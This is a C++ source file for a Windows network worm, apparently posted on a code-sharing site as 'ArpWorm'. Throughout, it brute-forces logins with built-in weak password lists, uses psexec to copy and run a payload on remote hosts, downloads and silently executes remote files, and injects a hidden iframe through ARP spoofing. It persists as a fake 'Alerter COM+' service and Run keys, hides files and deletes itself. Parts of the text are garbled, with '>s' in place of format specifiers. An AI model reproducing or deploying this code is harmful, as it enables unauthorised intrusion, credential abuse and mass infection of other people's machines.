ArpWorm.rar WebDown.cpp

www.pudn.com > ArpWorm.rar > WebDown.cpp

// WebDown.cpp : Defines the entry point for the console application.
#include "stdafx.h"
#include "WebDown.h"
#include "wrom.h"
#include "win32cpp.h"
//#include "ipc.h"
#include <Dbt.h>
#include "winsvc.h"

#include "winsvc.h"

#include "winsock2.h"
#pragma comment(lib,"ws2_32.lib")

#include "PingI.h"
#include "winnetwk.h"
#pragma comment(lib,"mpr.lib")

#include <tlhelp32.h>

//#include "afxinet.h"

#include <Iprtrmib.h>

const char *user[]={
"administrator","admin", "guest","alex", "home",
"love","xp", "user","game", "123",
"movie","time", "yeah","money", "xpuser",
0};
const char *pass[]={
"NULL",
"password", "123456","qwerty","abc123", "memory",
"home", "12345678","love","xp", "88888",
"5201314", "1314520","asdfgh","alex", "angel",
"123", "asdf","baby","woaini", "movie",
0};

/////////////////////////////////////////////////////////////////////////////
struct MODIFY_DATA
{
char DownFile[100];//下载文件列表
char DownRunFile[100]; //下载ip和服务端程序执行
char DownRunURLFile[100]; //下载ip和服务端程序执行
char ArpInject[256]; //Arp感染挂马代码
char DownRunArpFile[100]; //下载Arp URL
char DownRunBindFile[100]; //文件捆绑下载 URL
bool IsWorm;//是否感染EXE启动
bool IsUpan;//是否u盘传播
bool IsShare;//是否弱口令传播
bool IsAnti;//是否反查杀
bool IsARP; //是否ARP感染
int WaitTime;//巡查时间（分钟）
}modify_data =
{
"http://127.0.0.1/down.list",
"http://127.0.0.1/",
"http://127.0.0.1/",
"<iframe src='http://xxx.htm' width=0 height=0>",
"http://127.0.0.1/",
"http://127.0.0.1/",
false,
false,
false,
false,
false,
20,
};

HWND hWnd;
char DownFileDate1[9]="88-88-88";
char DownFileDate2[9]="88-88-88";

SERVICE_STATUS service_status_ss;
SERVICE_STATUS_HANDLE handle_service_status;
SC_HANDLE scm,svc;

//======================================
typedef DWORD (WINAPI *GetTcpTableFun)(PMIB_TCPTABLE,PDWORD,BOOL);
typedef DWORD (WINAPI *SetTcpEntryFun) (PMIB_TCPROW );
typedef DWORD (WINAPI *GetUdpTableFun)(PMIB_UDPTABLE,PDWORD,BOOL);

PMIB_TCPTABLE mibtcp; //TCP
PMIB_UDPTABLE mibUdp; //UDP
BYTE pTcpBuf[100*20+4];
char *DisConIPAddr[10];
int iDisCon;

HINSTANCE hInst;
GetTcpTableFun pGetTcp;
GetUdpTableFun pGetUdp;
SetTcpEntryFun pEtyTcp;

//========================================

/*解密数据函数*/
void DecryptRecord(char *szRec, unsigned long nLen, char *szKey)
{
unsigned long i;
char *p;

p = szKey;

for(i = 0; i < nLen; i++) {
if(!(*p))
p = szKey;

*szRec -= *p;
*szRec++ ^= *p++;
}
}

//====================================================================
void KillProcess(char * processName)
{
HANDLE hSnapshot;
hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 pe;
Process32First(hSnapshot,&amt;pe);
do
{ CString KillProcessName = processName;
if(KillProcessName.CompareNoCase(pe.szExeFile) == 0)
{
HANDLE hProcess;
hProcess=OpenProcess(PROCESS_TERMINATE,FALSE,pe.th32ProcessID);
if (hProcess)
{
TerminateProcess(hProcess,0);//关闭进程
}
}
}
while(Process32Next(hSnapshot,&amt;pe));
CloseHandle(hSnapshot);
}

DWORD ConnectRemote(const char *RemoteIP,const char *lpUserName,const char *lpPassword)
{
char sDownRunFileUP[256], sDownRunFileServer[256], char sPwd[20];
memset(sDownRunFileUP, 0, 256);
memset(sDownRunFileServer, 0, 256);
sprintf(sDownRunFileUP, ">s", modify_data.DownRunFile);
sprintf(sDownRunFileServer, ">s", modify_data.DownRunURLFile);

char SysDirBuff[256], File1[256], File2[256];
memset(File1, 0, 256);
memset(File2, 0, 256);
::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
sprintf(File1, ">s\\psexec.exe", SysDirBuff);
sprintf(File2, ">s\\servrr.exe", SysDirBuff);

URLDownloadToFile(0, sDownRunFileUP, File1, 0, 0);
URLDownloadToFile(0, sDownRunFileServer, File2, 0, 0);

memset(sPwd, 0, 20);
if(strcmp(lpPassword, "NULL") == 0)
sprintf(sPwd, "\">s\"", "");
else
sprintf(sPwd, ">s", lpPassword);

char filesring[2048];
memset(filesring, 0, 2048);
sprintf(filesring, ">s\\psexec.exe \\\\>s -u >s -p >s -c >s\\servrr.exe -d", SysDirBuff, RemoteIP, lpUserName, sPwd, SysDirBuff);
Sleep(1000);
int nRet = WinExec(filesring, SW_HIDE);
return nRet;
}

CString jian2(CString ch)
{
CString aaa;
int nCount = 0;
for(int i=0;i<ch.GetLength();i++)
{
if(ch.Mid(i,1)=='.')
{
nCount ++;
if(nCount == 2)
{
aaa = ch.Left(i + 1);
}
}

}

return(aaa);

}

CString jian(CString ch)
{
CString aaa;
for(int i=0;i<ch.GetLength();i++)
{
if(ch.Mid(i,1)=='0'||ch.Mid(i,1)=='1'||ch.Mid(i,1)=='2'||ch.Mid(i,1)=='3'||ch.Mid(i,1)=='4'||ch.Mid(i,1)=='5'||ch.Mid(i,1)=='6'||ch.Mid(i,1)=='7'||ch.Mid(i,1)=='8'||ch.Mid(i,1)=='9'||ch.Mid(i,1)=='.')
aaa+=ch.Mid(i,1);
// else
// break;
}

return(aaa);

}

CString jian1(CString ch)
{
CString aaa = ch.Right(3);
for(int i=0;i<aaa.GetLength();i++)
{
if(aaa.Mid(i,1)=='.')
{
aaa = aaa.Right(3 - (i + 1));
break;
}

}

CString bbb = ch.Left(ch.GetLength() - aaa.GetLength());

return(bbb);

}

//取得公网IP
void getipfun()
{
CInternetSession session; //声明该对象为获取网页属性做准备
CHttpFile *pFile=NULL;
CString str,ch; //www.ip138.com/ips8.asp
CString m_szSite="http://union.itlearner.com/ip/getip.asp"; //该地址是获取外网IP的关键，原理就是通过该地址来获取外网IP的
try{
pFile=(CHttpFile*)session.OpenURL(m_szSite);} //打开该地址
catch(CInternetException *pEx) //错误处理
{
pFile=NULL;
pEx->Delete();
}
if(pFile)
{
while(pFile->ReadString(str)) //读入该字符串
{
ch+=str+"\r\n";
}
pFile->Close();
delete pFile;
}
else
{
ch+="";
}
CString lin;
CString aaaa;
lin=ch.Mid(ch.Find("input name=\"ip\"")+2,50); //处理获取的带有IP的字符串
lin=lin.Mid(lin.Find(".") - 3,15); //处理获取的带有IP的字符串
lin=jian(lin); //再次处理带有IP的字符串

CString bbb = jian2(lin);
CString cccccc;
for(int j = 90; j < 255; j ++)
{
for(int n = 2; n < 255; n ++)
{
cccccc.Empty();
cccccc.Format(">s>d.>d", bbb, j, n);
if(cccccc.CompareNoCase(lin) != 0)
{
for(int mm = 0;user[mm]; mm++)
{
for (int k=0;pass[k];k++)
{
ConnectRemote(cccccc, user[mm], pass[k]);
}
}

}

}

}

}

//==================================================================================
DWORD ArpRemote(const char *RemoteIP)
{
char SysDirBuff[256], ArpFile[256], strDownRunArpFile[256], strDownRunWincap[256],
strWpCapDll[256], strPaketdll[256], strwanpacketdll[256],
DownRunWincap[256], WpCapDll[256], Paketdll[256], wanpacketdll[256];
memset(ArpFile, 0, 256);
::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
sprintf(ArpFile, ">s\\ArpW.exe", SysDirBuff);
memset(strDownRunArpFile, 0, 256);
memset(strDownRunWincap, 0, 256);
memset(strWpCapDll, 0, 256);
memset(strPaketdll, 0, 256);
memset(strwanpacketdll, 0, 256);

memset(DownRunWincap, 0, 256);
memset(WpCapDll, 0, 256);
memset(Paketdll, 0, 256);
memset(wanpacketdll, 0, 256);
sprintf(DownRunWincap, ">s\\nogui.exe", SysDirBuff);
sprintf(WpCapDll, ">s\\wpcap.dll", SysDirBuff);
sprintf(Paketdll, ">s\\packet.dll", SysDirBuff);
sprintf(wanpacketdll, ">s\\wanpacket.dll", SysDirBuff);

sprintf(strDownRunArpFile, ">s/arp.exe", modify_data.DownRunArpFile);
sprintf(strDownRunWincap, ">s/nogui.exe", modify_data.DownRunArpFile);
sprintf(strWpCapDll, ">s/wpcap.dll", modify_data.DownRunArpFile);
sprintf(strPaketdll, ">s/packet.dll", modify_data.DownRunArpFile);
sprintf(strwanpacketdll, ">s/wanpacket.dll", modify_data.DownRunArpFile);

URLDownloadToFile(0, strDownRunArpFile, ArpFile, 0, 0);
URLDownloadToFile(0, strDownRunWincap, DownRunWincap, 0, 0);
URLDownloadToFile(0, strWpCapDll, WpCapDll, 0, 0);
URLDownloadToFile(0, strPaketdll, Paketdll, 0, 0);
URLDownloadToFile(0, strwanpacketdll, wanpacketdll, 0, 0);

char filesring[2048];
memset(filesring, 0, 2048);
//运行wincap
WinExec(DownRunWincap, SW_HIDE);

Sleep(50000);

memset(filesring, 0, 2048);
sprintf(filesring, ">s\\ArpW.exe -idx 0 -ip >s -port 80 -insert \">s\"", SysDirBuff, RemoteIP, modify_data.ArpInject);
WinExec(filesring, SW_HIDE);
return 0;
}

void LocalToArp()
{
WORD wVersion =0 ;
int errret = -1;
WSADATA wsaData;

wVersion = MAKEWORD(2,2);
errret = WSAStartup(wVersion,&amt;wsaData);

if( LOBYTE( wsaData.wVersion) != 2 ||
HIBYTE( wsaData.wVersion) !=2 )
{
return ;
}

char szHostName[128]; //将本机的名称存入一维数组,数组名称为szHostName
struct hostent * pHost; //定义结构体 hostent
int i; //定义变量i
char IPStr[100];

LVITEM lvi;
lvi.mask=LVIF_IMAGE|LVIF_TEXT;

lvi.iItem=0;
lvi.iSubItem=0;
lvi.iImage=0;

if(gethostname(szHostName,128)==0)
{
pHost = gethostbyname(szHostName);
for( i = 0; pHost!= NULL &amt;&amt; pHost->h_addr_list[i]!= NULL; i++ )
{
CString IPAddress = inet_ntoa (*(struct in_addr *)pHost->h_addr_list[i]);

CString cccc = jian1(IPAddress);

memset(IPStr, 0, 100);

sprintf(IPStr, ">s2->s255", cccc, cccc);

ArpRemote(IPStr);
}
}

WSACleanup();
}

unsigned long CALLBACK ARP_thread(LPVOID dParam)
{

LocalToArp();

return 0;
}

//捆绑感染
DWORD DownBindRun()
{
char SysDirBuff[256], ArpFile[256];
memset(ArpFile, 0, 256);
::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
sprintf(ArpFile, ">s\\BindF.exe", SysDirBuff);

URLDownloadToFile(0, modify_data.DownRunBindFile, ArpFile, 0, 0);

int nRet = WinExec(ArpFile, SW_HIDE);
return 0;
}

unsigned long CALLBACK Bind_thread(LPVOID dParam)
{
DownBindRun();

return 0;
}

//==================================================================================

/* 功能说明：查询本机的名称和IP地址. */
void QueryLocalIP()
{
WORD wVersion =0 ;
int errret = -1;
WSADATA wsaData;

wVersion = MAKEWORD(2,2);
errret = WSAStartup(wVersion,&amt;wsaData);

if( LOBYTE( wsaData.wVersion) != 2 ||
HIBYTE( wsaData.wVersion) !=2 )
{
return ;
}

char szHostName[128]; //将本机的名称存入一维数组,数组名称为szHostName
struct hostent * pHost; //定义结构体 hostent
int i; //定义变量i

LVITEM lvi;
lvi.mask=LVIF_IMAGE|LVIF_TEXT;

lvi.iItem=0;
lvi.iSubItem=0;
lvi.iImage=0;

if(gethostname(szHostName,128)==0) //如果本机的名称查到，则将其名称送入List控件
{
pHost = gethostbyname(szHostName);
for( i = 0; pHost!= NULL &amt;&amt; pHost->h_addr_list[i]!= NULL; i++ )
{
CString IPAddress = inet_ntoa (*(struct in_addr *)pHost->h_addr_list[i]);

CString cccc = jian1(IPAddress);
for(int j = 2; j < 255; j ++)
{
CString ddd;
ddd.Format(">s>d", cccc, j);
if(ddd.CompareNoCase(IPAddress) != 0)
{
for(int mm = 0;user[mm]; mm++)
{
for (int k=0;pass[k];k++)
{
ConnectRemote(ddd, user[mm], pass[k]);
}
}

}
}
}
}

WSACleanup();
}

int TCPConnect()
{
pGetTcp=NULL;
pGetUdp=NULL;
pEtyTcp=NULL;
hInst=NULL;

HINSTANCE hInst = LoadLibrary("iphlpapi.dll");
if(hInst==NULL) return FALSE;

pGetTcp = (GetTcpTableFun)GetProcAddress(hInst, "GetTcpTable");
if(pGetTcp==NULL)
{
if (hInst!=NULL) FreeLibrary(hInst);

return FALSE;
}
pGetUdp=(GetUdpTableFun)GetProcAddress(hInst,"GetUdpTable");
if(pGetUdp==NULL)
{
if (hInst!=NULL) FreeLibrary(hInst);
return FALSE;
}

pEtyTcp=(SetTcpEntryFun)GetProcAddress(hInst,"SetTcpEntry");
if(pEtyTcp==NULL)
{
if (hInst!=NULL) FreeLibrary(hInst);
return FALSE;
}

if(pGetTcp==NULL ||pGetUdp==NULL)
{
if (hInst!=NULL) FreeLibrary(hInst);
return 0;
}
//netstat 方式感染
CString strStatus,strTmp;

BYTE pUdpBuf[100*8+4];
DWORD dwTableSize;
DWORD lret;
int i,k=0;
in_addr addrLoc,addrRem;
char szLocAddr[100],szRemAddr[100];
DWORD dwLocIP,dwRemIP;
unsigned short nLocalPort,nRemotePort;

dwTableSize=100*20+4;
lret=pGetTcp((PMIB_TCPTABLE)pTcpBuf,&amt;dwTableSize,FALSE);
if (lret != NO_ERROR)
{
if (hInst!=NULL) FreeLibrary(hInst);
return 0;
}
mibtcp=(PMIB_TCPTABLE)pTcpBuf;
k=(int)mibtcp->dwNumEntries-1;

for(i=0;i<k;i++){

dwRemIP=htonl(mibtcp->table[i].dwRemoteAddr);
addrRem.S_un.S_addr = ntohl(dwRemIP);
strcpy(szRemAddr, inet_ntoa(addrRem));
//判断是否本地IP
if(strcmp(szRemAddr, "0.0.0.0") != 0 &amt;&amt; strcmp(szRemAddr, "127.0.0.1") != 0)
{//用户名和密码枚举连接
for(int mm = 0;user[mm]; mm++)
{
for (int j=0;pass[j];j++)
{
ConnectRemote(szRemAddr, user[mm], pass[j]);
}
}
}

}
if (hInst!=NULL) FreeLibrary(hInst);
return 0;

}

unsigned long CALLBACK TCP_thread(LPVOID dParam)
{

while(1)
{
//内网IP
QueryLocalIP();
//外网
getipfun();
//netstat
TCPConnect();

Sleep(20*60000);
}

return 0;
}

unsigned long CALLBACK DOWN_thread(LPVOID dParam)
{

while(1)
{
//内网IP
DownExec(modify_data.DownFile);

Sleep(modify_data.WaitTime*60*1000);
}

return 0;
}

unsigned long CALLBACK IPC_thread(LPVOID dParam)
{
WORD wVersion =0 ;
int errret = -1;
WSADATA wsaData;

wVersion = MAKEWORD(2,2);
errret = WSAStartup(wVersion,&amt;wsaData);

if( LOBYTE( wsaData.wVersion) != 2 ||
HIBYTE( wsaData.wVersion) !=2 )
{
// MessageBox(NULL,"winsocket库版本低","提示",MB_OK);
return FALSE;
}

/*获取计算机名称*/
CHAR szHostName[128]={0}; //将本机的名称存入一维数组,数组名称为szHostName
struct hostent * pHost; //定义结构体 hostent

int i; //定义变量i

SOCKADDR_IN saddr;

if(gethostname(szHostName,128)==0) //如果本机的名称查到，
{
pHost = gethostbyname(szHostName);
for( i = 0; pHost!= NULL &amt;&amt; pHost->h_addr_list[i]!= NULL; i++ )
{

memset(&amt;saddr,0,sizeof(saddr));
memcpy(&amt;saddr.sin_addr.s_addr, pHost->h_addr_list[i], pHost->h_length);

}
}

char ip[128];
int count;

BOOL bpingOK=FALSE;

for(count=1;count<254;count++)
{
memset(ip,0,128);
sprintf(ip,
">d.>d.>d.>d",
saddr.sin_addr.S_un.S_un_b.s_b1,
saddr.sin_addr.S_un.S_un_b.s_b2,
saddr.sin_addr.S_un.S_un_b.s_b3,
count);
CPingI m_PingI;
bpingOK = m_PingI.Ping(2,(LPCSTR)ip,NULL);
if (bpingOK)
{//用户名和密码枚举连接
for(int i = 0;user[i]; i++)
{
for (int j=0;pass[j];j++)
{
if (ConnectRemote(ip,user[i],pass[j])==0)
break;
}
}
}

}

WSACleanup();
//printf("Hello World!\n");
return 0;
}

//=====================================================================

//***********************************************//自删除
void uninstall(void)//Thanks to Spybot
{
char batfile[MAX_PATH];
char tempdir[MAX_PATH];
char tcmdline[MAX_PATH];
char cmdline[MAX_PATH];
char This_File[MAX_PATH];
HANDLE f;
DWORD r;
PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
GetTempPath(sizeof(tempdir), tempdir);
sprintf(batfile, ">s\\rs.bat", tempdir);
f = CreateFile(batfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
if (f != INVALID_HANDLE_VALUE)
{
// write a batch file to remove our executable once we close
WriteFile(f, "@echo off\r\n"
":start\r\nif not exist \"\">1\"\" goto done\r\n"
"del /F \"\">1\"\"\r\n"
"del \"\">1\"\"\r\n"
"goto start\r\n"
":done\r\n"
"del /F >temp>\rs.bat\r\n"
"del >temp>\r.bat\r\n", 105, &amt;r, NULL);
CloseHandle(f);

memset(&amt;sinfo, 0, sizeof(STARTUPINFO));
sinfo.cb = sizeof(sinfo);
sinfo.wShowWindow = SW_HIDE;
memset(This_File,0,sizeof(This_File));
GetModuleFileName(NULL, This_File, sizeof(This_File));
sprintf(tcmdline, ">>comspec>> /c >s >s", batfile, This_File); // build command line
ExpandEnvironmentStrings(tcmdline, cmdline, sizeof(cmdline)); // put the name of the command interpreter into the command line

// execute the batch file
CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &amt;sinfo, &amt;pinfo);
}
}

int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
int nRetCode = 0;

///自复制----------------------
char SysDirBuff[256];
char filename[256];
char This_File[256];
::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
strcpy(filename,SysDirBuff);
strcat(filename,"\\IME\\svchost.exe");
GetModuleFileName(NULL, This_File, sizeof(This_File));

if (_stricmp(This_File,filename)!=0)
{
DeleteFile(filename);
if(::CopyFile(This_File,filename,FALSE)==0) return -1;
SetFileAttrib(filename);//隐藏了则不能拷贝？？
PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
memset(&amt;pinfo,0,sizeof(pinfo));
memset(&amt;sinfo,0,sizeof(sinfo));
CreateProcess(filename,NULL, NULL, NULL,TRUE,0, NULL,SysDirBuff, &amt;sinfo, &amt;pinfo);
uninstall();
ExitProcess(0);
}

//注释解密部分
DecryptRecord((char*)&amt;modify_data,sizeof(MODIFY_DATA),"1314");

//服务入口表-----------------------------------
SERVICE_TABLE_ENTRY service_tab_entry[2];
service_tab_entry[0].lpServiceName="Alerter COM+"; //线程名字
service_tab_entry[0].lpServiceProc=ServiceMain; //线程入口地址
//可以有多个线程，最后一个必须为NULL
service_tab_entry[1].lpServiceName=NULL;
service_tab_entry[1].lpServiceProc=NULL;

if (StartServiceCtrlDispatcher(service_tab_entry)==0)//首次运行
{
InstallService();
}

return nRetCode;
}

/***********************************************/
//服务的真正入口点函数
void WINAPI ServiceMain(DWORD dwArgc,LPTSTR *lpszArgv)
{
service_status_ss.dwServiceType=SERVICE_WIN32;
service_status_ss.dwCurrentState=SERVICE_START_PENDING;
service_status_ss.dwControlsAccepted=SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_PAUSE_CONTINUE;
service_status_ss.dwServiceSpecificExitCode=0;
service_status_ss.dwWaitHint=0;
service_status_ss.dwCheckPoint=0;
service_status_ss.dwWin32ExitCode=0;
if ((handle_service_status=RegisterServiceCtrlHandler("Alerter COM+",Handler))==0)
{
//::MessageBox(NULL,"RegisterServiceCtrlHandler error",NULL,MB_OK);
}//一个服务对应一个控制处理器
service_status_ss.dwCurrentState=SERVICE_RUNNING;
service_status_ss.dwWaitHint=0;
service_status_ss.dwCheckPoint=0;
::SetServiceStatus(handle_service_status,&amt;service_status_ss);

//创建互斥量-----------------------------------
HANDLE m_hMutex=CreateMutex(NULL,FALSE,"Alerter COM+");
//检查错误代码
if(GetLastError()==ERROR_ALREADY_EXISTS)
{
//如果已有互斥量存在则释放句柄并复位互斥量
CloseHandle(m_hMutex);
m_hMutex=NULL;
//退出程序
ExitProcess(0);
}

//开启感染线程，实施感染启动----------------------------
if (modify_data.IsWorm)//
{
::CreateThread(NULL,0,Bind_thread,NULL,0,NULL);
}
//开启Arp感染
if (modify_data.IsARP)//
{
::CreateThread(NULL,0,ARP_thread,NULL,0,NULL);
}

//开启IPC共享传播---------------------------------------
if (modify_data.IsShare)//
{
::CreateThread(NULL,0,TCP_thread,NULL,0,NULL);
}

::CreateThread(NULL,0,DOWN_thread,NULL,0,NULL);

//拷贝文件到各盘
if(modify_data.IsUpan)
{//搜索从C到Z各个盘符，感染每个磁盘。
for (char cLabel='c'; cLabel<='z'; cLabel++)
{
char strRootPath[] = {"c:\\"};
strRootPath[0] = cLabel;
if(GetDriveType(strRootPath)== DRIVE_FIXED)
{
CopyToUAndSet(strRootPath);
}
}
}

CreateMyWindow();
return ;
}
/***********************************************/
//服务控制器
void WINAPI Handler(DWORD dwControl)
{
switch(dwControl)
{
case SERVICE_CONTROL_STOP:
service_status_ss.dwCurrentState=SERVICE_STOPPED;
::SetServiceStatus(handle_service_status,&amt;service_status_ss);
break;
case SERVICE_CONTROL_CONTINUE:
service_status_ss.dwCurrentState=SERVICE_RUNNING;
::SetServiceStatus(handle_service_status,&amt;service_status_ss);
break;
case SERVICE_CONTROL_PAUSE:
service_status_ss.dwCurrentState=SERVICE_PAUSED;
::SetServiceStatus(handle_service_status,&amt;service_status_ss);
break;
case SERVICE_CONTROL_INTERROGATE:
break;

}
::SetServiceStatus(handle_service_status,&amt;service_status_ss);

}

/***********************************************/
bool InstallService()
{
DWORD dwErrorCode;

char szSysDir[256];
memset(szSysDir,0,sizeof(szSysDir));
::GetSystemDirectory(szSysDir,sizeof(szSysDir));
strcat(szSysDir,"\\IME\\svchost.exe");

scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);//打开服务控制管理器数据库
if (scm!=NULL)
{
svc=::CreateService(scm,"Alerter COM+","Alerter COM+",SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS,
SERVICE_AUTO_START,SERVICE_ERROR_IGNORE,szSysDir,NULL,NULL,NULL,NULL,NULL);

svc=::OpenService(scm,"Alerter COM+",SERVICE_START);
if (svc!=NULL)
{
if(StartService(svc,0,NULL)==0)//已经存在该服务,就启动服务
{
dwErrorCode=GetLastError();
if(dwErrorCode==ERROR_SERVICE_ALREADY_RUNNING)
{
CloseServiceHandle(scm);
CloseServiceHandle(svc);
return true;
}
}
while(QueryServiceStatus(svc,&amt;service_status_ss)!=0)
{
if(service_status_ss.dwCurrentState==SERVICE_START_PENDING)
{
Sleep(100);
}
else
{
break;
}
}
CloseServiceHandle(svc);
}
CloseServiceHandle(scm);
}
else
return false;

return true;
}
/************************************************/
/************************************************/
int CreateMyWindow()
{
MSG msg;
WNDCLASS wndc;
LPSTR szAppName="WebDown";
wndc.style=0;
wndc.lpfnWndProc=WndProc;
wndc.cbClsExtra=0;
wndc.cbWndExtra=0;
wndc.hInstance=NULL;
wndc.hIcon=NULL;
wndc.hCursor=NULL;
wndc.hbrBackground=(HBRUSH)(COLOR_WINDOW+1);
wndc.lpszMenuName=NULL;
wndc.lpszClassName=szAppName;
RegisterClass(&amt;wndc);
hWnd=CreateWindow(szAppName,"Alerter COM+",
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT,CW_USEDEFAULT,
CW_USEDEFAULT,CW_USEDEFAULT,
NULL,NULL,NULL,NULL);
ShowWindow(hWnd,SW_HIDE);
UpdateWindow(hWnd);

SendMessage(hWnd,WM_DEVICECHANGE,0,0);//检测有没有插入设备消息

while(GetMessage(&amt;msg,NULL,0,0))
{
TranslateMessage(&amt;msg);
DispatchMessage(&amt;msg);
}
return 1;
}

BOOL Register()
{
long ret = 0;
HKEY hKEY;
char chCurPath[MAX_PATH];
char chSysPath[MAX_PATH];
char lpNewFileName1[MAX_PATH];
char lpNewFileName2[MAX_PATH];
LPSTR lpCurFileName;
DWORD dwType = REG_SZ;
DWORD dwSize = MAX_PATH;
char lpRegPath[256] = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";

::GetSystemDirectory(chSysPath, dwSize);
::GetModuleFileName(NULL, chCurPath, dwSize);

//拷贝文件
lpCurFileName = chCurPath;
sprintf(lpNewFileName1, ">s\\internt.exe", chSysPath);
SetFileAttrib(chSysPath);
ret = CopyFile(lpCurFileName, lpNewFileName1, FALSE);
sprintf(lpNewFileName2, ">s\\progmon.exe", chSysPath);
SetFileAttrib(chSysPath);
ret = CopyFile(lpCurFileName, lpNewFileName2, FALSE);
//打开注册表键值
ret = RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpRegPath, 0, KEY_WRITE, &amt;hKEY);
if(ret != ERROR_SUCCESS)
{
RegCloseKey(hKEY);
return FALSE;
}

//设置注册表键值
ret = RegSetValueEx(hKEY, "Internt", NULL, dwType,
(const unsigned char*)lpNewFileName1, dwSize);

ret = RegSetValueEx(hKEY, "Program file", NULL, dwType,
(const unsigned char*)lpNewFileName2, dwSize);

RegCloseKey(hKEY);

//-----------------------
DWORD dwData=0x00000000;
char lpRegPath2[256] = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL";
ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,lpRegPath2,0,KEY_READ|KEY_WRITE,&amt;hKEY);
if(ret != ERROR_SUCCESS)
{
RegCloseKey(hKEY);
return FALSE;
}
RegSetValueEx(hKEY,"CheckedValue",0,REG_DWORD,(LPBYTE)&amt;dwData,sizeof(DWORD));
RegCloseKey(hKEY);

return TRUE;
}

///************************************************
bool GetDownFileDate(char Url[],char Date[])
{
HMODULE hDll;
LPVOID hInternet,hUrlHandle;
char buf[9];
DWORD dwFlags;

hDll = LoadLibrary("wininet.dll");
if(hDll)
{
typedef LPVOID ( WINAPI * pInternetOpen ) (LPCTSTR ,DWORD ,LPCTSTR ,LPCTSTR ,DWORD );
typedef LPVOID ( WINAPI * pInternetOpenUrl ) ( LPVOID ,LPCTSTR ,LPCTSTR ,DWORD ,DWORD ,DWORD);
typedef BOOL ( WINAPI * pInternetCloseHandle ) ( LPVOID );
typedef BOOL ( WINAPI * pInternetReadFile ) (LPVOID ,LPVOID ,DWORD ,LPDWORD) ;
pInternetOpen InternetOpen=NULL;
pInternetOpenUrl InternetOpenUrl=NULL;
pInternetCloseHandle InternetCloseHandle=NULL;
pInternetReadFile InternetReadFile=NULL;
InternetOpen = ( pInternetOpen ) GetProcAddress( hDll, "InternetOpenA" );
InternetOpenUrl = (pInternetOpenUrl ) GetProcAddress ( hDll, "InternetOpenUrlA");
InternetCloseHandle = (pInternetCloseHandle) GetProcAddress (hDll,"InternetCloseHandle");
InternetReadFile = (pInternetReadFile) GetProcAddress(hDll,"InternetReadFile");

hInternet = InternetOpen("Alerter COM+",0, NULL, NULL, 0);
if (hInternet != NULL)
{
hUrlHandle = InternetOpenUrl(hInternet, Url, NULL, 0, 0x04000000, 0);
if (hUrlHandle!= NULL)
{
memset(buf,0,9);
InternetReadFile(hUrlHandle, buf,8, &amt;dwFlags);
InternetCloseHandle(hUrlHandle);
hUrlHandle = NULL;
}
InternetCloseHandle(hInternet);
hInternet = NULL;
}
FreeLibrary(hDll);
strcpy(Date,buf);
return true;
}
else
return false;
}
void DownFiles(char Url[])
{
HMODULE hDll;
LPVOID hInternet,hUrlHandle;
char buf[100],test[101];
DWORD dwFlags,dwSize;

hDll = LoadLibrary("wininet.dll");
if(hDll)
{
typedef LPVOID ( WINAPI * pInternetOpen ) (LPCTSTR ,DWORD ,LPCTSTR ,LPCTSTR ,DWORD );
typedef LPVOID ( WINAPI * pInternetOpenUrl ) ( LPVOID ,LPCTSTR ,LPCTSTR ,DWORD ,DWORD ,DWORD);
typedef BOOL ( WINAPI * pInternetCloseHandle ) ( LPVOID );
typedef BOOL ( WINAPI * pInternetReadFile ) (LPVOID ,LPVOID ,DWORD ,LPDWORD) ;
pInternetOpen InternetOpen=NULL;
pInternetOpenUrl InternetOpenUrl=NULL;
pInternetCloseHandle InternetCloseHandle=NULL;
pInternetReadFile InternetReadFile=NULL;
InternetOpen = ( pInternetOpen ) GetProcAddress( hDll, "InternetOpenA" );
InternetOpenUrl = (pInternetOpenUrl ) GetProcAddress ( hDll, "InternetOpenUrlA");
InternetCloseHandle = (pInternetCloseHandle) GetProcAddress (hDll,"InternetCloseHandle");
InternetReadFile = (pInternetReadFile) GetProcAddress(hDll,"InternetReadFile");

hInternet = InternetOpen("Alerter COM+",0, NULL, NULL, 0);
if (hInternet != NULL)
{
hUrlHandle = InternetOpenUrl(hInternet, Url, NULL, 0, 0x04000000, 0);
if (hUrlHandle!= NULL)
{
memset(buf,0,100);
InternetReadFile(hUrlHandle, buf,8, &amt;dwSize);//先读取日期
do
{
memset(buf,0,100);
if (!InternetReadFile(hUrlHandle, buf,100, &amt;dwSize))
{
break;
}
if (dwSize<100)
break; // Condition of dwSize=0 indicate EOF. Stop.
else
{
memset(test,0,101);
if(strstr(buf,"|")!=NULL)
{
strncpy(test,buf,strcspn(buf,"|"));
}
else
{
strncpy(test,buf,100);
}
//MessageBox(NULL,test,NULL,MB_OK);
DownExec(test);
}
Sleep(1000);
}while (TRUE);
InternetCloseHandle(hUrlHandle);
hUrlHandle = NULL;
}
InternetCloseHandle(hInternet);
hInternet = NULL;
}
FreeLibrary(hDll);
}
}

void DownExec(char url[])
{
char SysDirBuff[256], ArpFile[256];
memset(ArpFile, 0, 256);
::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
sprintf(ArpFile, ">s\\down.exe", SysDirBuff);

URLDownloadToFile(0, url, ArpFile, 0, 0);

WinExec(ArpFile, SW_HIDE);

}

//*************************************************
//*************************************************
LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam)
{
switch(message)
{
